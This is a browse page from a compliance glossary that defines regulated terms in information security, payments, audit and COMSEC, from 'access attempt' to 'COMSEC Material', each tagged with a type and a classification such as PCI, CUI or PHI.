Browse — Sensitivity · Regulated
1131 terms
TermTypeDefinitionClassificationsUpdated
access attemptnounA process of interaction with a communications system by one or more users to enable initiation of user information transfer. The process begins with the granting of an access request by an access originator, and ends in either successful access or access failure.EventRegulated
access codenounNumeric or alphanumeric data which, when entered correctly, authorizes entry into a secure area.CredentialRegulated
Access Control programnounA documented listing of procedures, schedules, roles and responsibilities, and plans or instructions to be performed to implement access control.ControlRegulatedPCI
access lognounA log that lists who has been permitted to physically or logically gain access.ArtifactRegulatedCUI
Access Management AccessnounManagement is the maintenance of access information which consists of four tasks: account administration, maintenance, monitoring, and revocation.ProcessRegulated
access revocation programnounA documented listing of procedures, schedules, roles and responsibilities, and plans to be performed to revoke access privileges.ProcessRegulatedCDI
Account Balancing Monitoring System (ABMS)nounThe Federal Reserve's computing system providing reserve account information to the Federal Reserve Banks and depository institutions on an intraday basis. ABMS serves both as an informational source and a monitoring tool. This information includes opening balances, funds and securities transfers, accounting activity, and depository institutions cap and collateral limits.SystemRegulatedCUI
Account-To-Account Payment (A2A)nounPayment system that allows the consumer to direct transfer of funds from one account to another account at a different financial institution.ProcessRegulatedPCI
Accounting Legend CodenounNumeric code used to indicate the minimum accounting controls required for items of accountable communications security (COMSEC) material within the COMSEC Material Control System.RequirementRegulatedCUI
Accounting NumbernounNumber assigned to an item of COMSEC material to facilitate its control.ArtifactRegulatedCDI
Accreditation PackagenounProduct comprised of a System Security Plan (SSP) and a report documenting the basis for the accreditation decision.ArtifactRegulatedCUI
Accrediting AuthoritynounSynonymous with Designated Accrediting Authority (DAA). See also Authorizing Official.OrganizationRegulated
accuracynounThe quality or state of being correct, precise, or near to the true value.MetricRegulated
Acquirer FeenounFee paid to the acquirer of the merchant sales draft. The acquirer of the sales draft collects a merchant discount fee (or processing fee) from the merchant for the costs associated with processing the transaction.RequirementRegulatedPCI
action itemnounA documented event, task or action that needs to take place. Action items are discreet units that can be handled by a single person.ArtifactRegulated
Activation DatanounPrivate data, other than keys, that are required to access cryptographic modules.DataRegulatedCUI
activity reportingnounThe action of providing an description of an account holder's activity.ArtifactRegulatedPII
Address Verification Service (AVS)nounBankcard company service that verifies the customer-provided billing address matches the billing address on their credit card account. The bankcard companies will not support merchants that opt for not using AVS if those transactions are disputed and will charge the merchant an additional 1.25% on those sales.CapabilityRegulatedPCI
Adequate SecuritynounSecurity commensurate with the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. Note: This includes assuring that information systems operate effectively and provide appropriate confidentiality, integrity, and availability, through the use of cost-effective management, personnel, operational, and technical controls.RequirementRegulated
Administrative SafeguardsnounAdministrative actions, policies, and procedures to manage the selection, development, implementation, and maintenance of security measures to protect electronic health information and to manage the conduct of the covered entity's workforce in relation to protecting that information.ControlRegulatedPHI
Advanced Encryption StandardnounThe Advanced Encryption Standard specifies a U.S. government-approved cryptographic algorithm that can be used to protect electronic data. The AES algorithm is a symmetric block cipher that can encrypt (encipher) and decrypt (decipher) information. This standard specifies the Rijndael algorithm, a symmetric block cipher that can process data blocks of 128 bits, using cipher keys with lengths of 128, 192, and 256 bits.ControlRegulated
Advanced Key ProcessornounA cryptographic device that performs all cryptographic functions for a management client node and contains the interfaces to 1) exchange information with a client platform, 2) interact with fill devices, and 3) connect a client platform securely to the primary services node (PRSN).PhysicalRegulatedCUI
affected partynounThis role is focused on contracting parties who are affected by organizational activities. Any individual who is in a contract and is affected by organizational activities should be assigned to this role.IdentityRegulated
affiliatenounThis role focuses on persons who are affiliated with other persons or organizations or on organizations or individuals that control or are controlled by a third party. Any person associated with another person or organization or any organization or individual being controlled by or controlling a third party should be assigned to this role.RoleRegulated
AgencynounAny executive department, military department, government corporation, government-controlled corporation, or other establishment in the executive branch of the government (including the Executive Office of the President), or any independent regulatory agency, but does not include: 1) the Government Accountability Office; 2) the Federal Election Commission; 3) the governments of the District of Columbia and of the territories and possessions of the United States, and their various subdivisions; or 4) government-owned contractor-operated facilities, including laboratories engaged in national defense research and production activities.OrganizationRegulatedCUI
Agency Certification AuthoritynounA CA that acts on behalf of an agency and is under the operational control of an agency.CapabilityRegulatedCUI
Agent BanknounA member of a bankcard company that agrees to participate in an acquirer's merchant processing program. The agent may be liable for losses incurred on its merchant accounts. An agent is usually a small financial institution that wants to offer merchant processing services as a customer service. Agent banks that only refer merchants to an acquiring financial institution's program are known as referral banks.OrganizationRegulated
Aggregate Short PositionnounThe sum of a Settlement Member's short positions, each such short position expressed in its base currency equivalent and adjusted by the applicable haircut.MetricRegulated
Aggregate Short Position LimitnounIn respect of a Settlement Member, the maximum aggregate short position that such Settlement Member is permitted to incur at any time.RequirementRegulated
agreementnounThis record category contains records of mutual understandings, written or verbal, made by two or more parties regarding a matter of opinion or their rights and obligations toward each other.RequirementRegulated
Alternate processnounAutomatic or manual process designed and established to continue critical business processes from point-of- failure to return-to-normalProcessRegulated
Alternate Work SitenounGovernmentwide, national program allowing federal employees to work at home or at geographically convenient satellite offices for part of the work week (e.g., telecommuting).PhysicalRegulated
anomalous transactionnounA transaction that deviates from the standards, procedures, and processes used to create a transaction.EventRegulatedPCI
Anti-jamnounCountermeasures ensuring that transmitted information can be received despite deliberate jamming attempts.ControlRegulatedCUI
applicable requirementnounThe relevant or appropriate necessary condition or conditions.RequirementRegulated
application controlnounControls related to transactions and data within application systems. Application controls ensure the completeness and accuracy of the records and the validity of the entries made resulting from both programmed processing and manual data entry. Examples of application controls include data input validation, agreement of batch totals and encryption of data transmitted.ControlRegulated
Approval to OperatenounThe official management decision issued by a DAA or PAA to authorize operation of an information system and to explicitly accept the residual risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals.ArtifactRegulatedCUI
ApprovednounFederal Information Processing Standard (FIPS)-approved or National Institute of Standards and Technology (NIST)-recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation.RequirementRegulated
Approved Mode of OperationnounA mode of the cryptographic module that employs only Approved security functions (not to be confused with a specific mode of an Approved security function, e.g., Data Encryption Standard Cipher-Block Chaining (DES CBC) mode).ControlRegulatedCUI
Approved Security FunctionnounA security function (e.g., cryptographic algorithm, cryptographic key management technique, or authentication technique) that is either a) specified in an Approved Standard; b) adopted in an Approved Standard and specified either in an appendix of the Approved Standard or in a document referenced by the Approved Standard; or c) specified in the list of Approved security functions.CapabilityRegulated
assessed risknounA detected and evaluated risk. An assessed risk of material misstatement at the assertion level is a significant risk.FindingRegulated
Assessment ObjectivenounA set of determination statements that expresses the desired outcome for the assessment of a security control or control enhancement.RequirementRegulated
asset physical securitynounThe protection of assets from theft, vandalism, natural disasters, and accidental damage.ControlRegulated
Asset Reporting FormatnounSCAP data model for expressing the transport format of information about assets (components) and the relationships between assets and reports.ArtifactRegulatedCUI
Assured Information SharingnounThe ability to confidently share information with those who need it, when and where they need it, as determined by operational need and an acceptable level of security risk.CapabilityRegulatedCUI
Attribute AuthoritynounAn entity, recognized by the Federal Public Key Infrastructure (PKI) Policy Authority or comparable agency body as having the authority to verify the association of attributes to an identity.OrganizationRegulatedCUI
audit activitynounThose activities and procedures through which information is obtained to verify conformance to regulatory or organizational requirementsProcessRegulated
audit committeenounAn operating committee of the Board of Directors charged with oversight of audit operations, including appraising the performance of the CPA firm, financial reporting and disclosure. Committee members are drawn from members of the company's board of directors, with a Chairperson selected from among the committee members.OrganizationRegulated
audit cyclenounThe accounting process that auditors employ in the review of a company's financial information. The audit cycle includes the steps that an auditor will take to ensure that the company's financial information is valid and accurate before releasing any financial statements.ProcessRegulated
Audit DatanounChronological record of system activities to enable the reconstruction and examination of the sequence of events and changes in an event.DataRegulated
audit findingnounThe documented conclusion reached as a result of an official inspection of an organization’s accounts or other item or process being audited, typically by an independent body.FindingRegulated
audit lognounA chronological record of system activities. Includes records of system accesses and operations performed in a given period.ArtifactRegulated
Audit Log eventnounAny of the various triggering actions that cause an application to write a new entry into the log.ArtifactRegulatedCUI
audit recordnounAn individual entry in an audit log related to an audited event.ArtifactRegulatedCUI
audit reportnounA report issued by an independent Auditor that expresses an opinion about whether the financial statements present fairly a company's financial position, operating results, and cash flows in accordance with generally accepted accounting principles.ArtifactRegulated
Audit ReviewnounThe assessment of an information system to evaluate the adequacy of implemented security controls, assure that they are functioning properly, identify vulnerabilities, and assist in implementation of new security controls where required. This assessment is conducted annually or whenever significant change has occurred and may lead to recertification of the information system.ProcessRegulatedCUI
audit standardnounRules prescribed for auditors by various national and international organizations such as the Auditing Practices Board (in the UK) and the Auditing Standards Board (in the US).FrameworkRegulated
Audit trailnounA chronological record that reconstructs and examines the sequence of activities surrounding or leading to a specific operation, procedure, or event in a security relevant transaction from inception to final result.ArtifactRegulated
Audit Work PapernounThis record category contains records of working papers that are vital to the successful accomplishment of all audit assignments performed.ArtifactRegulated
Authentication CodenounA cryptographic checksum based on an Approved security function (also known as a Message Authentication Code [MAC]).CredentialRegulated
authentication controlnounOne of several systems which restrict user access to a network.ControlRegulated
authentication methodnounA method of Verifying the identity of a user, such as a challenge password or a digital certificate.ControlRegulated
Authentication PeriodnounThe maximum acceptable period between any initial authentication process and subsequent reauthentication processes during a single terminal session or during the period data is being accessed.RequirementRegulatedCUI
Authentication ProtocolnounA defined sequence of messages between a Claimant and a Verifier that demonstrates that the Claimant has possession and control of a valid token to establish his/her identity, and optionally, demonstrates to the Claimant that he or she is communicating with the intended Verifier.ProcessRegulated
Authorization (ACH)nounA written or oral agreement between the originator and a receiver that allows payments processed through the ACH network to be deposited in, or withdrawn from, the receiver's account at a financial institution.RequirementRegulatedPCI
Authorization BoundarynounAll components of an information system to be authorized for operation by an authorizing official and excludes separately authorized systems, to which the information system is connected.RequirementRegulated
authorization recordnounA document or identifier which provides evidence of authorization.ArtifactRegulatedCUI
Authorization to operatenounThe official management decision given by a senior organizational official to authorize operation of an information system and to explicitly accept the risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security controls.ArtifactRegulatedCUI
authorized accessnounAccess to system components that (a) has been approved by a person designated to do so by management and (b) does not compromise segregation of duties, confidentiality commitments, or otherwise increase risk to the system beyond the levels approved by management (that is, access is appropriate).ControlRegulated
Authorized VendornounManufacturer of information assurance equipment authorized to produce quantities in excess of contractual requirements for direct sale to eligible buyers. Eligible buyers are typically U.S. government organizations or U.S. government contractors.OrganizationRegulated
Authorized Vendor ProgramnounProgram in which a vendor, producing an information systems security (INFOSEC) product under contract to NSA, is authorized to produce that product in numbers exceeding the contracted requirements for direct marketing and sale to eligible buyers. Eligible buyers are typically U.S. government organizations or U.S. government contractors. Products approved for marketing and sale through the AVP are placed on the Endorsed Cryptographic Products List (ECPL).ProcessRegulated
Authorizing Official Designated RepresentativenounAn organizational official acting on behalf of an authorizing official in carrying out and coordinating the required activities associated with security authorization.RoleRegulated
Automated Clearing House (ACH)nounAn electronic clearing system in which a data processing center handles payment orders that are exchanged among financial institutions, primarily via telecommunications networks. ACH systems process large volumes of individual payments electronically. Typical ACH payments include salaries, consumer and corporate bill payments, interest and dividend payments, and Social Security payments.SystemRegulatedPCI
automated clearing house activitynounAny transaction made through the Automated Clearing House network.EventRegulatedPCI
automated clearing house capturenounA service that allows a user to transmit automated clearing house data to a bank for posting and clearing.CapabilityRegulatedPCI
Automated ControlsnounSoftware routines designed into programs to ensure the validity, accuracy, completeness, and availability of input, processed, and stored data.ControlRegulated
Automated Key TransportnounThe transport of cryptographic keys, usually in encrypted form, using electronic means such as a computer network (e.g., key transport/agreement protocols).ProcessRegulated
Automated Teller Machine (ATM)nounAn electronic funds transfer (EFT) terminal that allows customers using a PIN-based debit (ATM) card to initiate transactions (e.g., deposits, withdrawals, account balance inquiries).PhysicalRegulatedPCI
Automatic Remote RekeyingnounProcedure to rekey a distant crypto-equipment electronically without specific actions by the receiving terminal operator. See Manual Remote Rekeying.ProcessRegulatedCUI
availability requirementnounAvailability requirement relates to the need for information to be available when required.RequirementRegulated
Back Office Conversion (BOC)nounUnder NACHA rules, BOC allows retailers and billers that accept checks at the point-of-sale or at manned bill payment locations to convert eligible checks to ACH debits in the back-office.ProcessRegulatedPCI
Back-up GenerationsnounA tape rotation methodology that creates three sets of back-up tapes: daily incremental sets or "sons," weekly full sets or "fathers," and end-of-month tapes or "grandfathers." This back-up methodology is frequently used to refer to master files for financial applications.ProcessRegulated
backgroundnounA persons previous experience, education, or social circumstances.ArtifactRegulatedPII
Backtracking ResistancenounBacktracking resistance is provided relative to time T if there is assurance that an adversary who has knowledge of the internal state of the Deterministic Random Bit Generator (DRBG) at some time subsequent to time T would be unable to distinguish between observations of ideal random bitstrings and (previously unseen) bitstrings that were output by the DRBG prior to time T. The complementary assurance is called Prediction Resistance.ControlRegulated
Bank Identification Number/Interbank Card Company (BIN/ICA)nounA series of assigned numbers used to identify the settling financial institution for both acquiring and issuing bankcard transactions.DataRegulatedPCI
Bank Secrecy ActnounThe Currency and Foreign Transactions Reporting Act, also known as the Bank Secrecy Act (BSA), and its implementing regulation, 31 CFR 103, is a tool the U.S. government uses to fight drug trafficking, money laundering, and other crimes. Congress enacted the BSA to prevent banks and other financial service providers from being used as intermediaries for, or to hide the transfer or deposit of money derived from, criminal activity.FrameworkRegulated
BankcardnounA general-purpose credit card, issued by a financial institution under agreement with the bankcard associations (Visa and MasterCard), which customers can use to purchase goods and services and to obtain cash against a line of credit established by the bankcard issuer.DataRegulatedPCI
BaselinenounHardware, software, databases, and relevant documentation for an information system at a given point in time.ArtifactRegulated
Bastion HostnounA special-purpose computer on a network specifically designed and configured to withstand attacks.SystemRegulated
Batch ProcessingnounThe transmission or processing of a group of related payment instructions.ProcessRegulatedPCI
beforenounThis limits a Control or Mandate's secondary verb to be put into play prior to the event taking place.ControlRegulated
Bilateral Key SecuritynounA multi-level data encryption system, based on the exchange of Bilateral Keys, allowing users of SWIFT to create, send, and receive SWIFT messages. Bilateral Keys are unique authenticator keys possessed by only the two parties (either the provider or recipient of a message) involved and provide confirmation in both directions of the legitimacy of a message sent via SWIFT.ControlRegulated
BindingnounAn acknowledgement by a trusted third party that associates an entity’s identity with its public key. This may take place through (1) a certification authority’s generation of a public key certificate, (2) a security officer’s verification of an entity’s credentials and placement of the entity’s public key and identifier in a secure database, or (3) an analogous method.ProcessRegulated
Black CorenounA communication network architecture in which user data traversing a global Internet Protocol (IP) network is end-to-end encrypted at the IP layer. Related to striped core.NetworkRegulatedCUI
BlacklistingnounThe process of the system invalidating a user ID based on the user’s inappropriate actions. A blacklisted user ID cannot be used to log on to the system, even with the correct authenticator. Blacklisting and lifting of a blacklisting are both security-relevant events. Blacklisting also applies to blocks placed against IP addresses to prevent inappropriate or unauthorized use of Internet resources.ProcessRegulated
BlocknounSequence of binary bits that comprise the input, output, State, and Round Key. The length of a sequence is the number of bits it contains. Blocks are also interpreted as arrays of bytes.DataRegulated
Body of EvidencenounThe set of data that documents the information system’s adherence to the security controls applied. The BoE will include a Requirements Verification Traceability Matrix (RVTM) delineating where the selected security controls are met and evidence to that fact can be found. The BoE content required by an Authorizing Official will be adjusted according to the impact levels selected.ArtifactRegulatedCUI
botnounA computer connected to the Internet that has been surreptitiously / secretly compromised with malicious logic to perform activities under remote the command and control of a remote administrator.ThreatRegulated
Boundary ProtectionnounMonitoring and control of communications at the external boundary of an information system to prevent and detect malicious and other unauthorized communication, through the use of boundary protection devices (e.g., proxies, gateways, routers, firewalls, guards, encrypted tunnels).ControlRegulated
boundary protection devicenounA device with appropriate mechanisms that: (i) facilitates the adjudication of different interconnected system security policies (e.g., controlling the flow of information into or out of an interconnected system); and/or (ii) provides information system boundary protection.NetworkRegulated
Bulk Electric System Cyber SystemnounOne or more Bulk Electric System (BES) Cyber Assets logically grouped by a responsible entity to perform one or more reliability tasks for a functional entity.SystemRegulatedCUI
Bulk Electric System Cyber System InformationnounInformation about the BES Cyber System that could be used to gain unauthorized access or pose a security threat to the BES Cyber System. BES Cyber System Information does not include individual pieces of information that by themselves do not pose a threat or could not be used to allow unauthorized access to BES Cyber Systems, such as, but not limited to, device names, individual IP addresses without context, ESP names, or policy statements. Examples of BES Cyber System Information may include, but are not limited to, security procedures or security information about BES Cyber Systems, Physical Access Control Systems, and Electronic Access Control or Monitoring Systems that is not publicly available and could be used to allow unauthorized access or unauthorized distribution; collections of network addresses; and network topology of the BES Cyber System.DataRegulatedCUI
business continuitynounThe providing of critical business functions to customers, suppliers, regulators, and other entities at acceptable predefined levels after incidents and business interruptions.ProcessRegulated
Business Continuity planningnounThe act of creating processes and procedures to put into place to ensure that essential organizational functions can continue during and after a disaster.ProcessRegulated
cablenounA wire or group of wires covered in a protective casing used for transmitting electricity or telecommunication signals.PhysicalRegulated
Call BacknounProcedure for identifying and authenticating a remote information system terminal, whereby the host system disconnects the terminal and reestablishes contact.ProcessRegulated
CanisternounType of protective package used to contain and dispense keying material in punched or printed tape form.PhysicalRegulatedCUI
Capstone PoliciesnounThose policies that are developed by governing or coordinating institutions of Health Information Exchanges (HIEs). They provide overall requirements and guidance for protecting health information within those HIEs. Capstone Policies must address the requirements imposed by: (1) all laws, regulations, and guidelines at the federal, state, and local levels; (2) business needs; and (3) policies at the institutional and HIE levels.RequirementRegulatedPHI
Card IssuernounA financial institution that issues general-purpose credit cards carrying one of the two bankcard company logos. The issuing financial institution establishes the credit relationship with the consumer.OrganizationRegulatedPCI
Card Verification Code (CVC2)nounNumeric security code printed on the back of MasterCard credit cards. CVC2 reduces credit card fraud and chargeback instances significantly when used in conjunction with AVS. (See Address verification service).CredentialRegulatedPCI
Card Verification Value (CVV2)nounThree-digit security number that is printed on the back of most Visa credit cards. CVV2 reduces credit card fraud and chargeback instances significantly when used in conjunction with AVS.CredentialRegulatedPCI
CardholdernounAn individual possessing an issued Personal Identity Verification (PIV) card.IdentityRegulatedCUI
CascadingnounDownward flow of information through a range of security levels greater than the accreditation range of a system, network, or component.EventRegulatedCUI
Cash LetternounA group of checks accompanied by a paper listing sent to a clearinghouse, a Federal Reserve Bank, or another institution. A cash letter contains a number of negotiable items, mostly checks, accompanied by a letter that lists the amounts and instructions for transmittal to another bank. May also be called a transmittal letter. An incoming cash letter is one that is received by an institution from a clearinghouse, a Federal Reserve Bank, or another institution and contains checks written on accounts at the institution that were cashed elsewhere. An outgoing cash letter is one that is being sent to a clearinghouse, a Federal Reserve Bank, or another institution and contains checks deposited at the institution, which are written on accounts at other institutions.ArtifactRegulatedPII
CategorynounRestrictive label applied to classified or unclassified information to limit access.RequirementRegulatedCUI
Central Office of RecordnounOffice of a federal department or agency that keeps records of accountable COMSEC material held by elements subject to its oversightOrganizationRegulatedCUI
CertificationnounA comprehensive assessment of the management, operational, and technical security controls in an information system, made in support of security accreditation, to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.ProcessRegulated
Certification authoritynoun1. For Certification and Accreditation (C&A) (C&A Assessment): Official responsible for performing the comprehensive evaluation of the security features of an information system and determining the degree to which it meets its security requirements 2. For Public Key Infrastructure (PKI): A trusted third party that issues digital certificates and verifies the identity of the holder of the digital certificate.OrganizationRegulatedCUI
Certification PackagenounProduct of the certification effort documenting the detailed results of the certification activities.ArtifactRegulatedCUI
Certification Test and EvaluationnounSoftware and hardware security tests conducted during development of an information system.ProcessRegulated
Certified TEMPEST Technical AuthoritynounAn experienced, technically qualified U.S. government employee who has met established certification requirements in accordance with CNSS-approved criteria and has been appointed by a U.S. government department or agency to fulfill CTTA responsibilities.RoleRegulatedCUI
Chain of custodynounA process that tracks the movement of evidence through its collection, safeguarding, and analysis lifecycle by documenting each person who handled the evidence, the date/time it was collected or transferred, and the purpose for the transfer.ProcessRegulated
Chain of EvidencenounA process and record that shows who obtained the evidence; where and when the evidence was obtained; who secured the evidence; and who had control or possession of the evidence. The “sequencing” of the chain of evidence follows this order: collection and identification; analysis; storage; preservation; presentation in court; return to owner.ProcessRegulatedCUI
ChargebacknounA transaction generated when a cardholder disputes a transaction or when the merchant does not follow bankcard company procedures. The issuer and acquirer research the facts to determine which party is responsible for the transaction. If the merchant is unable to pay, the acquirer will have to cover the chargeback.EventRegulatedPCI
ChecknounA written order from one party (payer) to another (payee) requiring the payer's financial institution to pay a specified sum on demand to the payee or to a third party specified by the payeeArtifactRegulatedPCI
Check 21 ActnounFormally known as the Check Clearing for the 21st Century Act. Creates a new document, the IRD (image replacement document or substitute check) that is the legal equivalent of the original check and should be accepted as such. The act does not require institutions to accept electronic images instead of checks or IRDs, but does require the acceptance of IRDs instead of paper checks. The exchange of electronic images is optional and will be done by agreements between individual institutions, groups of institutions, or clearinghouses.FrameworkRegulatedPCI
Check ClearingnounThe movement of a check from the depository institution where it was deposited to the institution on which it was written. The funds move in the opposite direction, with a corresponding credit and debit to the involved accounts.ProcessRegulated
Check ImagenounElectronic or digital image of an original check that is created by a depositor, a bank or other participant in the check collection process. Check images can be exchanged electronically by financial institutions, printed for customer statement purposes, displayed on Internet banking websites, and used to create substitute checks.DataRegulatedPCI
Check TruncationnounThe practice of holding a check at the institution where it was deposited (or at an intermediary institution) and electronically forwarding the essential information on the check to the institution on which it was written. A truncated check is not returned to the writer.ProcessRegulatedPCI
Check WordnounCipher text generated by cryptographic logic to detect failures in cryptography.ControlRegulatedCUI
Chief Information OfficernounAgency official responsible for: 1) providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information systems are acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency; 2) developing, maintaining, and facilitating the implementation of a sound and integrated information system architecture for the agency; and 3) promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency. Note: Organizations subordinate to federal agencies may use the term Chief Information Officer to denote individuals filling positions with similar security responsibilities to agency-level Chief Information Officers.RoleRegulated
Chief Information Security OfficernounThe person in charge of information security within the enterpriseRoleRegulated
CIP exceptional circumstancenounA situation that involves or threatens to involve one or more of the following, or similar, conditions that impact safety or Bulk Electric System (BES) reliability: a risk of injury or death; a natural disaster; civil unrest; an imminent or existing hardware, software, or equipment failure; a Cyber Security Incident requiring emergency assistance; a response by emergency services; the enactment of a mutual assistance agreement; or an impediment of large scale workforce availability.RequirementRegulatedCUI
CIP Senior ManagernounA single senior management official with overall authority and responsibility for leading and managing implementation of and continuing adherence to the requirements within the NERC CIP Standards, CIP-002 through CIP-011.RoleRegulatedCUI
ClaimantnounAn entity which is or represents a principal for the purposes of authentication, together with the functions involved in an authentication exchange on behalf of that entity. A claimant acting on behalf of a principal must include the functions necessary for engaging in an authentication exchange. (e.g., a smartcard [claimant] can act on behalf of a human user [principal])IdentityRegulatedPII
Classified Information SpillagenounSecurity incident that occurs whenever classified data is spilled either onto an unclassified information system or to an information system with a lower level of classification.EventRegulatedCUI
Classified National Security InformationnounInformation that has been determined pursuant to Executive Order 13526 or any predecessor order to require protection against unauthorized disclosure and is marked to indicate its classified status when in documentary form.DataRegulatedCUI
ClearancenounFormal certification of authorization to have access to classified information other than that protected in a special access program (including SCI). Clearances are of three types: confidential, secret, and top secret. A top secret clearance permits access to top secret, secret, and confidential material; a secret clearance, to secret and confidential material; and a confidential clearance, to confidential material.CredentialRegulatedCUI
ClearingnounRemoval of data from an information system, its storage devices, and other peripheral devices with storage capacity, in such a way that the data may not be reconstructed using common system capabilities (i.e., through the keyboard); however, the data may be reconstructed using laboratory methods.ProcessRegulatedCUI
Clearing CorporationnounAlso known as a clearing house or clearing house association. A central processing mechanism whereby members agree to net, clear, and settle transactions involving financial instruments. Clearing corporations fulfill one or all of the following functions: Net many trades so that the number and the amount of payments that have to be made are minimized, determine money obligations among traders, and guarantee that trades will go through by legally assuming the risk of payments not made or securities not delivered. The latter function is implied when it is stated that the clearing corporation becomes the "counterpart" to all trades entered into its system.OrganizationRegulated
Clearing House AssociationsnounVoluntary associations, formed by financial institutions that establish an exchange for checks drawn on them. Typically, institutions participating in check clearing houses use the Federal Reserve's National Settlement Service for the checks exchanged each business day.OrganizationRegulated
Clearing House Interbank Payment Systems (CHIPS)nounA "real time," multilateral, final payments system for large dollar value, business-to-business payment transactions between domestic or foreign institutions that have offices located in the United States. CHIPS is run by CHIP Co. LLC, a subsidiary of The Clearing House Payments Company, LLC.SystemRegulated
Clinger-Cohen Act of 1996nounAlso known as Information Technology Management Reform Act. A statute that substantially revised the way that IT resources are managed and procured, including a requirement that each agency design and implement a process for maximizing the value and assessing and managing the risks of IT investments.RequirementRegulated
Closed Security EnvironmentnounEnvironment providing sufficient assurance that applications and equipment are protected against the introduction of malicious logic during an information system life cycle. Closed security is based upon a system's developers, operators, and maintenance personnel having sufficient clearances, authorization, and configuration control.SystemRegulatedCUI
Closed StoragenounStorage of classified information within an accredited facility, in General Services Administration-approved secure containers, while the facility is unoccupied by authorized personnel.ControlRegulatedCUI
Code GroupnounGroup of letters, numbers, or both in a code system used to represent a plain text word, phrase, or sentence.DataRegulatedCUI
Cold SitenounBackup site that can be up and operational in a relatively short time span, such as a day or two. Provision of services, such as telephone lines and power, is taken care of, and the basic office furniture might be in place, but there is unlikely to be any computer equipment, even though the building might well have a network infrastructure and a room ready to act as a server room. In most cases, cold sites provide the physical location and basic services.PhysicalRegulated
Command AuthoritynounIndividual responsible for the appointment of user representatives for a department, agency, or organization and their key ordering privileges.RoleRegulated
Commercial COMSEC Evaluation ProgramnounRelationship between NSA and industry in which NSA provides the COMSEC expertise (i.e., standards, algorithms, evaluations, and guidance) and industry provides design, development, and production capabilities to produce a type 1 or type 2 product. Products developed under the CCEP may include modules, subsystems, equipment, systems, and ancillary devices.ProcessRegulatedCUI
Common Access CardnounStandard identification/smart card issued by the Department of Defense that has an embedded integrated chip storing public key infrastructure (PKI) certificates.CredentialRegulatedCUI
Common CarriernounIn a telecommunications context, a telecommunications company that holds itself out to the public for hire to provide communications transmission services. Note: In the United States, such companies are usually subject to regulation by federal and state regulatory commissions.OrganizationRegulated
Compliance Enforcement AuthoritynounThe North American Electric Reliability Corporation (NERC) or the Regional Entity in their respective roles of monitoring and enforcing compliance with the NERC Reliability Standards.OrganizationRegulatedCUI
compliance requirementnounThe various legal, contractual, and service level requirements that an organization must follow.RequirementRegulated
compliance risknounThe risk to current and prospective earnings that arises from violating or not acting in accordance with laws, rules, regulations, prescribed practices, or ethical standards.MetricRegulated
compliance violation is detectednounThis Triggering Event takes place when the condition of someone or something does not conform to the documented policies and standards has been discovered.FindingRegulated
CompromisenounDisclosure of information to unauthorized persons, or a violation of the security policy of a system in which unauthorized intentional or unintentional disclosure, modification, destruction, or loss of an object may have occurred.EventRegulated
Compromising EmanationsnounUnintentional signals that, if intercepted and analyzed, would disclose the information transmitted, received, handled, or otherwise processed by information systems equipment. See TEMPEST.VulnerabilityRegulatedCUI
Computer AbusenounIntentional or reckless misuse, alteration, disruption, or destruction of information processing resources.ThreatRegulated
Computer forensicsnounThe practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.ProcessRegulated
Computer Network AttacknounActions taken through the use of computer networks to disrupt, deny, degrade, or destroy information resident in computers and computer networks, or the computers and networks themselves.ThreatRegulatedCUI
computer network defensenounActions taken to defend against unauthorized activity within computer networks. CND includes monitoring, detection, analysis (such as trend and pattern analysis), and response and restoration activities.CapabilityRegulated
Computer Network ExploitationnounEnabling operations and intelligence collection capabilities conducted through the use of computer networks to gather data from target or adversary information systems or networks.ThreatRegulatedCUI
COMSEC AccountnounAdministrative entity, identified by an account number, used to maintain accountability, custody, and control of COMSEC material.IdentityRegulatedCUI
COMSEC Account AuditnounExamination of the holdings, records, and procedures of a COMSEC account ensuring all accountable COMSEC material is properly handled and safeguarded.ProcessRegulatedCUI
COMSEC AidnounCOMSEC material that assists in securing telecommunications and is required in the production, operation, or maintenance of COMSEC systems and their components. COMSEC keying material, callsign/frequency systems, and supporting documentation, such as operating and maintenance manuals, are examples of COMSEC aids.DataRegulatedCUI
COMSEC AssemblynounGroup of parts, elements, subassemblies, or circuits that are removable items of COMSEC equipment.PhysicalRegulatedCUI
COMSEC BoundarynounDefinable perimeter encompassing all hardware, firmware, and software components performing critical COMSEC functions, such as key generation, handling, and storage.ControlRegulatedCUI
COMSEC Control ProgramnounComputer instructions or routines controlling or affecting the externally performed functions of key generation, key distribution, message encryption/decryption, or authentication.ControlRegulatedCUI
COMSEC DemilitarizationnounProcess of preparing COMSEC equipment for disposal by extracting all CCI, classified, or cryptographic (CRYPTO) marked components for their secure destruction, as well as defacing and disposing of the remaining equipment hulk.ProcessRegulatedCUI
COMSEC ElementnounRemovable item of COMSEC equipment, assembly, or subassembly; normally consisting of a single piece or group of replaceable parts.PhysicalRegulatedCUI
COMSEC End-itemnounEquipment or combination of components ready for use in a COMSEC application.PhysicalRegulatedCUI
COMSEC EquipmentnounEquipment designed to provide security to telecommunications by converting information to a form unintelligible to an unauthorized interceptor and, subsequently, by reconverting such information to its original form for authorized recipients; also, equipment designed specifically to aid in, or as an essential element of, the conversion process. COMSEC equipment includes crypto-equipment, crypto-ancillary equipment, cryptographic production equipment, and authentication equipment.PhysicalRegulatedCUI
COMSEC FacilitynounAuthorized and approved space used for generating, storing, repairing, or using COMSEC material.PhysicalRegulatedCUI
COMSEC IncidentnounOccurrence that potentially jeopardizes the security of COMSEC material or the secure electrical transmission of national security information or information governed by 10 U.S.C. Section 2315.EventRegulatedCUI
COMSEC InsecuritynounCOMSEC incident that has been investigated, evaluated, and determined to jeopardize the security of COMSEC material or the secure transmission of information.EventRegulatedCUI
COMSEC MaterialnounItem designed to secure or authenticate telecommunications. COMSEC material includes, but is not limited to key, equipment, devices, documents, firmware, or software that embodies or describes cryptographic logic and other items that perform COMSEC functions.DataRegulatedCUI
